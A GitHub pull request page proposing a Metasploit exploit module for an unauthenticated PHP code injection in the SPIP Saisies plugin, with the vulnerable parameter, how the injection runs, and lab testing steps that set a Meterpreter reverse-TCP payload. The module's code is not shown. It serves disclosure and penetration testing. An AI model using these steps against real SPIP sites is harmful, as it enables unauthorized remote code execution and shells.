Add SPIP Saisies plugin RCE module (CVE-2025-71243)#21001
Open
Chocapikk wants to merge 3 commits intorapid7:masterfrom
Open
Add SPIP Saisies plugin RCE module (CVE-2025-71243)#21001Chocapikk wants to merge 3 commits intorapid7:masterfrom
Chocapikk wants to merge 3 commits intorapid7:masterfrom
Conversation
Chocapikk
force-pushed
the
add-module-spip-saisies-rce
branch
from
e3eb842 to
429c5ff
Compare
Chocapikk
force-pushed
the
add-module-spip-saisies-rce
branch
from
429c5ff to
a8f66a2
Compare
dledda-r7
added
module
docs
rn-modules
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Hello Metasploit Team,
This PR adds an exploit module for CVE-2025-71243, an unauthenticated PHP code injection in the SPIP Saisies plugin (versions 5.4.0 through 5.11.0).
Blog post with full technical details: https://github.com/Chocapikk/CVE-2025-71243
Module
exploit/multi/http/spip_saisies_rce(CVE-2025-71243)Unauthenticated RCE via the
_anciennes_valeursform parameter. The saisies plugin interpolates raw user input into a hidden field rendered withinterdire_scripts=false, allowing injected<?php ?>tags to be executed directly by PHP's template eval. Single POST request to any page containing a saisies-powered form.Since saisies forms are custom (typically created with the Formidable plugin), the module supports two modes:
FORM_PAGEto a known page name (e.g.contact)FORM_PAGEtocrawl(default) to auto-discover a form by fetching the SPIP sitemap and following internal linksMixin Enhancement
Added a
paquet.xmlfallback toMsf::Exploit::Remote::HTTP::Spip#spip_plugin_version. When theComposed-Byheader andlocal/config.txtare unavailable, the mixin now triesplugins/<name>/paquet.xmlandplugins/auto/<name>/paquet.xmldirectly. This benefits all SPIP modules that use plugin version detection.Targets
Verification
Docker Lab Setup
See the module documentation for full
docker-compose.ymlandsetup.sh. SPIP will be available athttp://127.0.0.1:8888with the vulnerable saisies 5.11.0 plugin and a contact form.Testing
msfconsoleuse exploit/multi/http/spip_saisies_rceset RHOSTS 127.0.0.1set RPORT 8888set PAYLOAD php/meterpreter/reverse_tcpset LHOST <your-ip>check- Verify it returnsAppears(saisies 5.11.0 detected via paquet.xml)set FORM_PAGE contactthenrun- Verify a Meterpreter session opensset FORM_PAGE crawlthenrun- Verify the crawler finds the form and a session opensDocumentation